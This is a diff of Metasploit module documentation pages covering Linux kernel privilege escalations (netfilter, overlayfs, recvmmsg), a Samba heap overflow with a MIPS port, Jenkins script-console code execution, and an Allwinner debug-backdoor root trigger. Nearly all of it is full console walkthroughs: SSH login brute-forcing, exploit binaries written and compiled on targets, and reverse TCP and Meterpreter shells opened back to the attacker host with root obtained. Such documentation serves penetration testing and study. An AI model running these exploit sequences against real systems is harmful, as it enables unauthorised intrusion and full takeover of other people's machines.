+    [*] Started reverse TCP handler on 192.168.199.131:4444 
+    [+] CONFIG_BPF_SYSCAL is set to yes
+    [+] kernel.unprivileged_bpf_disabled is NOT set to 1
+    [+] fuse is installed
+    [-] libfuse-dev is not installed.  Compiling will fail.
+    [*] Dropping pre-compiled exploit on system
+    [*] Writing pre-compiled binarys to target
+    [*] Max line length is 65537
+    [*] Writing 9576 bytes in 1 chunks of 24954 bytes (octal-encoded), using printf
+    [*] Max line length is 65537
+    [*] Writing 13920 bytes in 1 chunks of 36828 bytes (octal-encoded), using printf
+    [*] Max line length is 65537
+    [*] Writing 8840 bytes in 1 chunks of 21824 bytes (octal-encoded), using printf
+    [*] Writing payload to /tmp/AyDJSaMM
+    [*] Max line length is 65537
+    [*] Writing 188 bytes in 1 chunks of 506 bytes (octal-encoded), using printf
+    [*] Starting execution of priv esc.  This may take about 120 seconds
+    [+] got root, starting payload
+    [-] This exploit may require process killing of 'hello', and 'doubleput' on the target
+    [-] This exploit may requires manual umounting of /tmp/fuse_mount via 'fusermount -z -u /tmp/fuse_mount' on the target
+    [-] This exploit may requires manual deletion of /tmp/fuse_mount via 'rm -rf /tmp/fuse_mount' on the target
+    [*] Transmitting intermediate stager...(126 bytes)
+    [*] Sending stage (2412016 bytes) to 192.168.199.130
+    [*] Meterpreter session 2 opened (192.168.199.131:4444 -> 192.168.199.130:55522) at 2016-09-28 08:08:04 -0400
+    
+    meterpreter > getuid
+    Server username: uid=0, gid=0, euid=0, egid=0
@@ -27,7 +27,7 @@ This does not work against the following vulnerable systems.  Additional work ma

  1. Start msfconsole
  2. Exploit a box via whatever method
-  4. Do: `use exploit/linux/local/netfilter_priv_esc`
+  4. Do: `use exploit/linux/local/netfilter_priv_esc_ipv4`
  5. Do: `set session #`
  6. Do: `set verbose true`
  7. Do: `exploit`
@@ -115,7 +115,7 @@ This does not work against the following vulnerable systems.  Additional work ma

 #### Escalate w/ pre-compiled binaries

-    msf exploit(netfilter_priv_esc) > exploit
+    msf exploit(netfilter_priv_esc_ipv4) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.117:4444 
    [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
@@ -160,9 +160,9 @@ This does not work against the following vulnerable systems.  Additional work ma

 In this scenario, we already exploit the box, for whatever reason our shell died.  So now we want to re-exploit, but we dont need to run desc again.

-    msf exploit(netfilter_priv_esc) > set reexploit true
+    msf exploit(netfilter_priv_esc_ipv4) > set reexploit true
    reexploit => true
-    msf exploit(netfilter_priv_esc) > exploit
+    msf exploit(netfilter_priv_esc_ipv4) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.117:4444 
    [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
@@ -191,9 +191,9 @@ In this scenario, we already exploit the box, for whatever reason our shell died

 #### Re-exploit w/ pre-compiled binaries

-    msf exploit(netfilter_priv_esc) > set reexploit true
+    msf exploit(netfilter_priv_esc_ipv4) > set reexploit true
    reexploit => true
-    msf exploit(netfilter_priv_esc) > exploit
+    msf exploit(netfilter_priv_esc_ipv4) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.117:4444 
    [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
@@ -0,0 +1,181 @@
+## Creating A Testing Environment
+
+This module has been tested against:
+
+  1. CVE-2015-1328
+    1. Ubuntu 14.04
+      1. 3.13.0-24 (binary version of exploit compiled on)
+      2. 3.19.0-20
+      3. 3.19.0-21 (not vuln, exploit failed)
+      4. 3.13.0-55 (not vuln, exploit failed)
+  2. CVE-2015-8660
+    1. Ubuntu 14.04
+      1. 3.19.0-41 (binary version of exploit compiled on)
+
+Untested against
+
+  1. Fedora (code included to identify vuln versions)
+  2. Redhat (description includes vuln kernel versions)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Exploit a box via whatever method
+  4. Do: `use exploit/linux/local/overlayfs_priv_esc`
+  5. Do: `set session #`
+  6. Do: `set verbose true`
+  7. Do: `exploit`
+
+## Options
+
+  **COMPILE**
+
+  If we should attempt to compile on the system.  Defaults to Auto, which checks if `gcc` is installed
+
+  **WritableDir**
+
+  A folder we can write files to.  Defaults to /tmp
+
+## Scenarios
+
+### CVE-2015-8660 against Ubuntu 14.04 with kernel 3.19.0-41
+
+#### Initial Access
+
+    resource (/root/Text-1.txt)> use auxiliary/scanner/ssh/ssh_login
+    resource (/root/Text-1.txt)> set rhosts 192.168.2.156
+    rhosts => 192.168.2.156
+    resource (/root/Text-1.txt)> set username ubuntu
+    username => ubuntu
+    resource (/root/Text-1.txt)> set password ubuntu
+    password => ubuntu
+    resource (/root/Text-1.txt)> exploit
+    [*] SSH - Starting bruteforce
+    [+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 3.19.0-41-generic #46~14.04.2-Ubuntu SMP Tue Dec 8 17:46:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux '
+    [!] No active DB -- Credential data will not be saved!
+    [*] Command shell session 1 opened (192.168.2.117:39027 -> 192.168.2.156:22) at 2016-10-04 22:48:44 -0400
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+
+#### Escalate
+
+    resource (/root/Text-1.txt)> use exploit/linux/local/overlayfs_priv_esc
+    resource (/root/Text-1.txt)> set verbose true
+    verbose => true
+    resource (/root/Text-1.txt)> set payload linux/x86/shell/reverse_tcp
+    payload => linux/x86/shell/reverse_tcp
+    resource (/root/Text-1.txt)> set session 1
+    session => 1
+    resource (/root/Text-1.txt)> set target 1
+    target => 1
+    resource (/root/Text-1.txt)> set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    resource (/root/Text-1.txt)> exploit
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Checking if mount points exist
+    [+] /tmp/haxhax not created
+    [+] Kernel 3.19.0.pre.41.pre.generic is vulnerable to CVE-2015-8660
+    [+] gcc is installed
+    [*] Live compiling exploit on system
+    [*] Checking if mount points exist
+    [+] /tmp/haxhax not created
+    [+] Kernel 3.19.0.pre.41.pre.generic is vulnerable to CVE-2015-8660
+    [*] Writing to /tmp/svF1U2Ya.c (2356 bytes)
+    [*] Max line length is 65537
+    [*] Writing 2356 bytes in 1 chunks of 8098 bytes (octal-encoded), using printf
+    [*] Compiling /tmp/svF1U2Ya.c
+    [*] Writing to /tmp/fHCJO1ex (155 bytes)
+    [*] Max line length is 65537
+    [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
+    [*] Exploiting...
+    [*] Sending stage (36 bytes) to 192.168.2.156
+    [*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.156:44823) at 2016-10-04 22:48:57 -0400
+    [+] Deleted /tmp/svF1U2Ya.c
+    [+] Deleted /tmp/fHCJO1ex
+    
+    3986817421
+    viRVXKxRruOuDKwEBYAscFvJPPrtQbTO
+    true
+    zxrnfClHzgOcewXyEqQeEAcHsQmsEPtk
+    cqdStYFUGluqJkpgfGAkPvcVgoKTtJlY
+    EOzlAFTpQsoXMWIicFiKHxsVjjlFpspC
+    true
+    FgIyOJMyeREcjxpsbWkNDZNtuUGYmBtt
+    omnusQCOqEdrUTbMLtDmXibhFAVQuTAz
+    VPsVgFTxVwskShumsJkambKWMQhifDJi
+    whoami
+    root
+    uname -a
+    Linux Ubuntu14 3.19.0-41-generic #46~14.04.2-Ubuntu SMP Tue Dec 8 17:46:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
+
+### CVE-2015-1328 against Ubuntu 14.04 with kernel 3.13.0-24
+
+#### Initial Access
+
+    resource (/root/Text-1.txt)> use auxiliary/scanner/ssh/ssh_login
+    resource (/root/Text-1.txt)> set rhosts 192.168.2.156
+    rhosts => 192.168.2.156
+    resource (/root/Text-1.txt)> set username ubuntu
+    username => ubuntu
+    resource (/root/Text-1.txt)> set password ubuntu
+    password => ubuntu
+    resource (/root/Text-1.txt)> exploit
+    [*] SSH - Starting bruteforce
+    [+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux '
+    [!] No active DB -- Credential data will not be saved!
+    [*] Command shell session 1 opened (192.168.2.117:42139 -> 192.168.2.156:22) at 2016-10-04 22:54:50 -0400
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+
+#### Escalate
+
+    resource (overlay.rc)> use exploit/linux/local/overlayfs_priv_esc
+    resource (overlay.rc)> set verbose true
+    verbose => true
+    resource (overlay.rc)> set payload linux/x86/shell/reverse_tcp
+    payload => linux/x86/shell/reverse_tcp
+    resource (overlay.rc)> set target 0
+    target => 0
+    resource (overlay.rc)> set session 1
+    session => 1
+    resource (overlay.rc)> set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    resource (overlay.rc)> exploit
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Checking if mount points exist
+    [+] /tmp/ns_sploit not created
+    [+] Kernel 3.13.0.pre.24.pre.generic is vulnerable to CVE-2015-1328
+    [+] gcc is installed
+    [*] Live compiling exploit on system
+    [*] Checking if mount points exist
+    [+] /tmp/ns_sploit not created
+    [+] Kernel 3.13.0.pre.24.pre.generic is vulnerable to CVE-2015-1328
+    [*] Writing to /tmp/JmK51Dpa.c (3714 bytes)
+    [*] Max line length is 65537
+    [*] Writing 3714 bytes in 1 chunks of 13319 bytes (octal-encoded), using printf
+    [*] Writing to /tmp/ofs-lib.c (439 bytes)
+    [*] Max line length is 65537
+    [*] Writing 439 bytes in 1 chunks of 1563 bytes (octal-encoded), using printf
+    [*] Compiling /tmp/JmK51Dpa.c
+    [*] Writing to /tmp/R6TrMF7f (155 bytes)
+    [*] Max line length is 65537
+    [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
+    [*] Exploiting...
+    [*] Sending stage (36 bytes) to 192.168.2.156
+    [*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.156:35876) at 2016-10-14 11:26:49 -0400
+    [!] Tried to delete /tmp/ofs-lib.c, unknown result
+    [+] Deleted /tmp/JmK51Dpa
+    
+    2356964145
+    psMfOJcKGKnafhAvALIeSFNegauafmux
+    RHxxKeTrEKLTMmssPTZjlJvkpblZjWSH
+    KWETRaFhNLLRkUbhRkRoflvdRdbJBPFP
+    true
+    ORoIgajQlzSvaciHEGqEvQZqLZMpJDjQ
+    dTdIcyWRpQOpEHizUhOQkDVqQZaxQIFR
+    UCINXsLPGwYDBqnRKbFyLFOzkbifFPiF
+    sh: 0: can't access tty; job control turned off
+    # # # whoami
+    root
+    # uname -a
+    Linux Ubuntu14 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
@@ -0,0 +1,133 @@
+## Creating A Testing Environment
+
+This module works against Ubuntu 13.04, and 13.10.  As of writing this, those releases are at EOL (end of life).  If you wish to install `gcc` or other command, you'll need to fix your `/etc/sources.list` to
+point to the correct repos.
+
+`sudo sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list` [source](http://askubuntu.com/questions/91815/how-to-install-software-or-upgrade-from-an-old-unsupported-release)
+
+This module has been tested against:
+
+  1. Ubuntu 13.04 (default kernel) 3.8.0-19-generic
+
+This module should also work against:
+
+  1. Ubuntu 13.10 (default kernel) 3.11.0-12-generic
+  2. Ubuntu 13.10 3.11.0-15-generic
+
+More kernels could be added to this, just need the proper offsets.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Exploit a box via whatever method
+  3. Do: `use exploit/linux/local/recvmmsg_priv_esc`
+  4. Do: `set session #`
+  5. Do: `set verbose true`
+  6. Do: `exploit`
+
+## Options
+
+  **COMPILE**
+
+  If we should attempt to compile live on the system, or drop a binary.  Default is `auto` which will compile if `gcc` is installed.
+
+  **WritableDir**
+
+  A folder we can write files to.  Defaults to /tmp
+
+## Scenarios
+
+### Ubuntu 13.04 (with default kernel: 3.8.0-19-generic)
+
+#### Initial Access
+
+    [*] Processing recvmmsg.rc for ERB directives.
+    resource (recvmmsg.rc)> use auxiliary/scanner/ssh/ssh_login
+    resource (recvmmsg.rc)> set rhosts 192.168.2.20
+    rhosts => 192.168.2.20
+    resource (recvmmsg.rc)> set username ubuntu
+    username => ubuntu
+    resource (recvmmsg.rc)> set password ubuntu
+    password => ubuntu
+    resource (recvmmsg.rc)> exploit
+    [*] SSH - Starting bruteforce
+    [+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare) Linux ubuntu1304 3.8.0-19-generic #29-Ubuntu SMP Wed Apr 17 18:16:28 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
+    [!] No active DB -- Credential data will not be saved!
+    [*] Command shell session 1 opened (192.168.2.117:39613 -> 192.168.2.20:22) at 2016-10-08 23:19:48 -0400
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+
+#### Escalate
+
+    resource (recvmmsg.rc)> use exploit/linux/local/recvmmsg_priv_esc
+    resource (recvmmsg.rc)> set verbose true
+    verbose => true
+    resource (recvmmsg.rc)> set payload linux/x86/shell/reverse_tcp
+    payload => linux/x86/shell/reverse_tcp
+    resource (recvmmsg.rc)> set session 1
+    session => 1
+    resource (recvmmsg.rc)> set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    resource (recvmmsg.rc)> exploit
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [+] Kernel 3.8.0.pre.19.pre.generic is exploitable
+    [+] gcc is installed
+    [*] Live compiling exploit on system
+    [+] Kernel 3.8.0.pre.19.pre.generic is exploitable
+    [*] Writing to /tmp/4bUIkbrG.c (5950 bytes)
+    [*] Max line length is 65537
+    [*] Writing 5950 bytes in 1 chunks of 20667 bytes (octal-encoded), using printf
+    [*] Compiling /tmp/4bUIkbrG.c
+    [*] Writing to /tmp/a0RwAacU (185 bytes)
+    [*] Max line length is 65537
+    [*] Writing 185 bytes in 1 chunks of 560 bytes (octal-encoded), using printf
+    [*] Exploiting... May take 17min.  Start time: 2016-10-08 23:20:00 -0400
+    [*] Sending stage (36 bytes) to 192.168.2.20
+    [*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.20:38465) at 2016-10-08 23:32:49 -0400
+    
+    id
+    uid=0(root) gid=0(root) groups=0(root)
+    uname -a
+    Linux ubuntu1304 3.8.0-19-generic #29-Ubuntu SMP Wed Apr 17 18:16:28 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
+
+### Using pre-compiled binaries on the same system
+
+    resource (recvmmsg.rc)> use exploit/linux/local/recvmmsg_priv_esc
+    resource (recvmmsg.rc)> set verbose true
+    verbose => true
+    resource (recvmmsg.rc)> set payload linux/x86/shell/reverse_tcp
+    payload => linux/x86/shell/reverse_tcp
+    resource (recvmmsg.rc)> set session 1
+    session => 1
+    resource (recvmmsg.rc)> set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    resource (recvmmsg.rc)> exploit
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [+] Kernel 3.8.0.pre.19.pre.generic is exploitable
+    [-] gcc is not installed.  Compiling will fail.
+    [*] Dropping pre-compiled exploit on system
+    [+] Kernel 3.8.0.pre.19.pre.generic is exploitable
+    [*] Writing to /tmp/Yc0xB9oC (14571 bytes)
+    [*] Max line length is 65537
+    [*] Writing 14571 bytes in 1 chunks of 38575 bytes (octal-encoded), using printf
+    [*] Writing to /tmp/a0RwAacU (185 bytes)
+    [*] Max line length is 65537
+    [*] Writing 185 bytes in 1 chunks of 560 bytes (octal-encoded), using printf
+    [*] Exploiting... May take 17min.  Start time: 2016-10-08 23:42:01 -0400
+    [*] Sending stage (36 bytes) to 192.168.2.20
+    [*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.20:38465) at 2016-10-08 23:54:50 -0400
+    [+] Deleted /tmp/Yc0xB9oC
+    [+] Deleted /tmp/a0RwAacU
+    
+    2689016405
+    carERUCEUgdCZfvTyiWuBklsNMqcNhey
+    true
+    dPZDicgefmDeBvIpRYKaToiSQmHWQxBe
+    yGWMZKlCTQskKCZERIXNchDARUIzzBJn
+    FjFxyOSVHntGpawbQfSzIdRPsbeyOgSq
+    true
+    HFPuJArQoYvuxhkoWbAwvdDbNVUjSdUL
+    vMvWNASOZcfTmStOGnozdJzfTAUWJYzU
+    VQUKZqzBlQaQJmbtyQSSNudDtINToRhu
+    whoami
+    root
@@ -0,0 +1,91 @@
+## Vulnerable Application
+
+  Samba 3.0.0 through 3.0.25rc3 are vulnerable to multiple heap overflows. This module targets a heap overflow in the LsarLookupSids RPC call (CVE-2007-2446), causing an overflow in the function lsa\_io\_trans_name().
+
+  The exploit uses the heap overflow to overwrite a function pointer contained in the metadata of the TALLOC memory allocator, a technique which only works on Samba versions 3.0.21-3.0.24.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use exploit/linux/samba/lsa_transnames_heap`
+  3. Do: `show targets` to see the possible targets
+  4. Do: `set target #`
+  5. Do: `set rhost`
+  6. Do: `exploit`
+
+## MIPS port
+
+  This module was ported to exploit the MIPS architecture. After creating a suitable debugging environment using qemu to emulate Samba on a desktop PC the following steps were required:
+
+### MIPS nop generator
+
+  The exploit uses a heap overflow to put a large nop sled in memory to decrease the accuracy needed in the initial redirection of code flow. A nop sled is a large section of contiguous instructions which do nothing. When code flow is redirected to a nop sled it will continue executing the effect-less nops. At the end of the sled the true payload is added and execution will eventually hit this code.
+
+  A nop generator module was created for MIPS by creating a stream of random instructions which create no side-effects e.g. `sll $2, $2, 0`
+
+### Heap address brute force
+
+  The exploit uses a brute force approach to minimize problems with unpredictability in heap layout. The exploit itself is run multiple times, each time targeting a different point in the heap with the change of execution flow. If all goes correctly, the nop sled will be hit and code execution will follow. If the nop sled is missed, the Samba process is likely to crash, which is generally not a problem as a new instance is forked for each incoming connection. In the event of a crash, a new heap address is chosen and exploitation is attempted again.
+
+  When porting the exploit to a new system, the approximate heap layout must be known in order to suitably attempt exploitation across all of the possible heap locations. As the MIPS port targeted a specific router, the heap layout was determined by examining the ranges identified in _/proc/<pid>/maps_
+
+## Scenarios
+
+    msf > use exploit/linux/samba/lsa\_transnames_heap
+    msf exploit(lsa\_transnames_heap) > set target 7
+    target => 7
+    msf exploit(lsa\_transnames_heap) > set rhost 192.168.1.1
+    rhost => 192.168.1.1
+    msf exploit(lsa\_transnames_heap) > show options
+
+    Module options (exploit/linux/samba/lsa\_transnames_heap):
+
+       Name     Current Setting  Required  Description
+       ----     ---------------  --------  -----------
+       RHOST    192.168.1.1      yes       The target address
+       RPORT    445              yes       The SMB service port
+       SMBPIPE  LSARPC           yes       The pipe name to use
+
+
+    Exploit target:
+
+       Id  Name
+       --  ----
+       7   Linux Heap Brute Force (OpenWRT MIPS)
+
+
+    msf exploit(lsa\_transnames_heap) > exploit
+
+    [*] Started reverse TCP handler on 192.168.1.3:4444
+    [*] 192.168.1.1:445 - Creating nop sled....
+    [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x55900000...
+    [*] 192.168.1.1:445 - Connecting to the SMB service...
+    [*] 192.168.1.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ...
+    [*] 192.168.1.1:445 - Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ...
+    [*] 192.168.1.1:445 - Calling the vulnerable function...
+    [*] 192.168.1.1:445 - Server did not respond, this is expected
+    [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x5590f000...
+    [*] 192.168.1.1:445 - Connecting to the SMB service...
+    [*] 192.168.1.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ...
+    [*] 192.168.1.1:445 - Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ...
+    [*] 192.168.1.1:445 - Calling the vulnerable function...
+    [*] 192.168.1.1:445 - Server did not respond, this is expected
+
+    ...Some intermediate attempts ommitted...
+
+    [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x55996000...
+    [*] 192.168.1.1:445 - Connecting to the SMB service...
+    [*] 192.168.1.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ...
+    [*] 192.168.1.1:445 - Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ...
+    [*] 192.168.1.1:445 - Calling the vulnerable function...
+    [*] 192.168.1.1:445 - Server did not respond, this is expected
+    [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x559a5000...
+    [*] 192.168.1.1:445 - Connecting to the SMB service...
+    [*] 192.168.1.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ...
+    [*] 192.168.1.1:445 - Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ...
+    [*] 192.168.1.1:445 - Calling the vulnerable function...
+    [*] Command shell session 1 opened (192.168.1.3:4444 -> 192.168.1.1:4175) at 2016-10-31 14:00:33 +0000
+
+    uname -a
+    Linux WNR2200 2.6.15 #1 Mon Dec 23 15:58:24 CST 2013 mips unknown
+
@@ -0,0 +1,130 @@
+## Vulnerable Application
+
+  Jenkins can be downloaded from [jenkins.io](https://jenkins.io/) where
+  binaries are available for a variety of operating systems. Both LTS and weekly
+  builds are available.
+
+  Default settings have the script console enabled and require a valid user
+  account in order to access it. A known account can be used with this module by
+  setting the `USERNAME` and `PASSWORD` options.
+
+## Verification Steps
+
+  Example steps in this format:
+
+  1. Install the application
+  1. Start msfconsole
+  1. Do: ```use exploit/multi/http/jenkins_script_console```
+  1. Do: ```set RHOST [target host]```
+  1. Do: ```set TARGET [target id]```
+  1. Do: ```exploit```
+  1. You should get a shell.
+
+## Options
+
+  **TARGETURI**
+
+  The path to the target instance of Jenkins.
+
+  **USERNAME**
+
+  A username to an account that has access to the script console. This is only
+  necessary if the Jenkins instance has been configured to require
+  authentication.
+
+  **PASSWORD**
+
+  A password to an account that has access to the script console. This is only
+  necessary if the Jenkins instance has been configured to require
+  authentication.
+
+## Scenarios
+
+  Example usage against a Windows 7 SP1 x64 bit target running Jenkins 2.19.1.
+
+  ```
+  msf > use exploit/multi/http/jenkins_script_console
+  msf exploit(jenkins_script_console) > set TARGETURI /
+  TARGETURI => /
+  msf exploit(jenkins_script_console) > set USERNAME steiner
+  USERNAME => steiner
+  msf exploit(jenkins_script_console) > set PASSWORD I<3msf!
+  PASSWORD => I<3msf!
+  msf exploit(jenkins_script_console) > set RHOST 192.168.254.126
+  RHOST => 192.168.254.126
+  msf exploit(jenkins_script_console) > set RPORT 8080
+  RPORT => 8080
+  msf exploit(jenkins_script_console) > set PAYLOAD windows/meterpreter/reverse_tcp
+  PAYLOAD => windows/meterpreter/reverse_tcp
+  msf exploit(jenkins_script_console) > set LHOST 192.168.254.132
+  LHOST => 192.168.254.132
+  msf exploit(jenkins_script_console) > exploit
+
+  [*] [2016.10.29-18:43:07] Started reverse TCP handler on 192.168.254.132:4444
+  [*] [2016.10.29-18:43:07] Checking access to the script console
+  [*] [2016.10.29-18:43:07] Logging in...
+  [*] [2016.10.29-18:43:07] Using CSRF token: '9623d245b9d60b5ceda72e2d3613431c' (Jenkins-Crumb style)
+  [*] [2016.10.29-18:43:07] 192.168.254.126:8080 - Sending command stager...
+  [*] [2016.10.29-18:43:08] Command Stager progress -   2.06% done (2048/99626 bytes)
+  [*] [2016.10.29-18:43:08] Command Stager progress -   4.11% done (4096/99626 bytes)
+  [*] [2016.10.29-18:43:08] Command Stager progress -   6.17% done (6144/99626 bytes)
+  [*] [2016.10.29-18:43:09] Command Stager progress -   8.22% done (8192/99626 bytes)
+  [*] [2016.10.29-18:43:09] Command Stager progress -  10.28% done (10240/99626 bytes)
+  [*] [2016.10.29-18:43:09] Command Stager progress -  12.33% done (12288/99626 bytes)
+  [*] [2016.10.29-18:43:10] Command Stager progress -  14.39% done (14336/99626 bytes)
+  [*] [2016.10.29-18:43:10] Command Stager progress -  16.45% done (16384/99626 bytes)
+  [*] [2016.10.29-18:43:10] Command Stager progress -  18.50% done (18432/99626 bytes)
+  [*] [2016.10.29-18:43:11] Command Stager progress -  20.56% done (20480/99626 bytes)
+  [*] [2016.10.29-18:43:11] Command Stager progress -  22.61% done (22528/99626 bytes)
+  [*] [2016.10.29-18:43:11] Command Stager progress -  24.67% done (24576/99626 bytes)
+  [*] [2016.10.29-18:43:12] Command Stager progress -  26.72% done (26624/99626 bytes)
+  [*] [2016.10.29-18:43:12] Command Stager progress -  28.78% done (28672/99626 bytes)
+  [*] [2016.10.29-18:43:12] Command Stager progress -  30.84% done (30720/99626 bytes)
+  [*] [2016.10.29-18:43:13] Command Stager progress -  32.89% done (32768/99626 bytes)
+  [*] [2016.10.29-18:43:13] Command Stager progress -  34.95% done (34816/99626 bytes)
+  [*] [2016.10.29-18:43:13] Command Stager progress -  37.00% done (36864/99626 bytes)
+  [*] [2016.10.29-18:43:14] Command Stager progress -  39.06% done (38912/99626 bytes)
+  [*] [2016.10.29-18:43:14] Command Stager progress -  41.11% done (40960/99626 bytes)
+  [*] [2016.10.29-18:43:14] Command Stager progress -  43.17% done (43008/99626 bytes)
+  [*] [2016.10.29-18:43:15] Command Stager progress -  45.23% done (45056/99626 bytes)
+  [*] [2016.10.29-18:43:15] Command Stager progress -  47.28% done (47104/99626 bytes)
+  [*] [2016.10.29-18:43:15] Command Stager progress -  49.34% done (49152/99626 bytes)
+  [*] [2016.10.29-18:43:16] Command Stager progress -  51.39% done (51200/99626 bytes)
+  [*] [2016.10.29-18:43:16] Command Stager progress -  53.45% done (53248/99626 bytes)
+  [*] [2016.10.29-18:43:17] Command Stager progress -  55.50% done (55296/99626 bytes)
+  [*] [2016.10.29-18:43:17] Command Stager progress -  57.56% done (57344/99626 bytes)
+  [*] [2016.10.29-18:43:17] Command Stager progress -  59.61% done (59392/99626 bytes)
+  [*] [2016.10.29-18:43:18] Command Stager progress -  61.67% done (61440/99626 bytes)
+  [*] [2016.10.29-18:43:18] Command Stager progress -  63.73% done (63488/99626 bytes)
+  [*] [2016.10.29-18:43:18] Command Stager progress -  65.78% done (65536/99626 bytes)
+  [*] [2016.10.29-18:43:19] Command Stager progress -  67.84% done (67584/99626 bytes)
+  [*] [2016.10.29-18:43:19] Command Stager progress -  69.89% done (69632/99626 bytes)
+  [*] [2016.10.29-18:43:19] Command Stager progress -  71.95% done (71680/99626 bytes)
+  [*] [2016.10.29-18:43:20] Command Stager progress -  74.00% done (73728/99626 bytes)
+  [*] [2016.10.29-18:43:20] Command Stager progress -  76.06% done (75776/99626 bytes)
+  [*] [2016.10.29-18:43:20] Command Stager progress -  78.12% done (77824/99626 bytes)
+  [*] [2016.10.29-18:43:21] Command Stager progress -  80.17% done (79872/99626 bytes)
+  [*] [2016.10.29-18:43:21] Command Stager progress -  82.23% done (81920/99626 bytes)
+  [*] [2016.10.29-18:43:21] Command Stager progress -  84.28% done (83968/99626 bytes)
+  [*] [2016.10.29-18:43:22] Command Stager progress -  86.34% done (86016/99626 bytes)
+  [*] [2016.10.29-18:43:22] Command Stager progress -  88.39% done (88064/99626 bytes)
+  [*] [2016.10.29-18:43:22] Command Stager progress -  90.45% done (90112/99626 bytes)
+  [*] [2016.10.29-18:43:23] Command Stager progress -  92.51% done (92160/99626 bytes)
+  [*] [2016.10.29-18:43:23] Command Stager progress -  94.56% done (94208/99626 bytes)
+  [*] [2016.10.29-18:43:23] Command Stager progress -  96.62% done (96256/99626 bytes)
+  [*] [2016.10.29-18:43:24] Command Stager progress -  98.67% done (98304/99626 bytes)
+  [*] [2016.10.29-18:43:24] Sending stage (957999 bytes) to 192.168.254.126
+  [*] [2016.10.29-18:43:24] Command Stager progress - 100.00% done (99626/99626 bytes)
+  [*] Meterpreter session 1 opened (192.168.254.132:4444 -> 192.168.254.126:49258) at 2016-10-29 18:43:26 -0400
+
+  meterpreter > sysinfo
+  Computer        : PWNME-PC
+  OS              : Windows 7 (Build 7601, Service Pack 1).
+  Architecture    : x64 (Current Process is WOW64)
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x86/win32
+  meterpreter >
+
+  ```
@@ -0,0 +1,71 @@
+  Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
+  Vulnerable OS: all OS images available for Orange Pis,
+				 any for FriendlyARM's NanoPi M1,
+				 SinoVoip's M2+ and M3,
+				 Cuebietech's Cubietruck +
+				 Linksprite's pcDuino8 Uno
+  Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
+
+This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).  It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
+
+## Usage
+
